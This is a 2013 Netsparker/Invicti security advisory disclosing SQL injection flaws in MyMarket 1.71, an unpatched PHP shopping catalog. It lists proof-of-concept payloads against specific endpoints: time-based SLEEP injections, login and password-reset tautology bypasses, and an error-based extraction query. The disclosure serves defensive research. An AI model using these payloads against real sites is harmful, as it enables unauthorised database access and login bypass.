Information
--------------------

Advisory by Netsparker (now Invicti)
Name: SQL Injection Vulnerabilities in MyMarket
Software: MyMarket 1.71 and possibly below.
Vendor Homepage: http://mymarket.sourceforge.net/
Vulnerability Type: SQL Injection
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-13-008

Description
--------------------

MyMarket is a fully functional online shopping catalog system, built using PHP and MySQL. It was created by Ying Zhang for the purpose of teaching people about the basics of creating an E-Commerce site.   

Details
--------------------

MyMarket is affected by SQL Injection vulnerabilities in version 1.71.

Example PoC urls are as follows :

Boolean / Blind SQL Injection Vulnerabilities

  • http://example.com/users/change_settings.php
    POST - params: address, phone
    Payload: '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
  • http://example.com/login.php
    POST - param:
    username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
  • http://example.com/shopping/product_details.php?id='%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)%2b'
  • http://example.com/users/forgot_password.php
    POST - param:
    email=' OR 'ns'='ns
  • http://example.com/shopping/cart_add.php
    POST - param:
    id=' OR 'ns'='ns
  • http://example.com/shopping/search.php
    POST - param:
    search=-1'%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2C1)%3E(SELECT%20COUNT(*)%2C
    CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)%2C0x3a%2C
    FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b'
  • http://example.com/shopping/product_details.php?id=-1'%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2C1)%3E(SELECT%20COUNT(*)%2C
    CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)%2C0x3a%2C
    FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b'

You can read the full article about SQL Injection vulnerabilities from here :

Solution
--------------------
No patch was released.

Advisory Timeline
--------------------

01/08/2013 - First contact: No response
09/09/2013 - Advisory Released

Credits
--------------------

It has been discovered on testing of Invicti Web Application Security Scanner.

References
--------------------

MSL Advisory Link : /sql-injection-vulnerabilities-in-mymarket/
Invicti Advisories : /web-applications-advisories/

About Invicti
--------------------
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.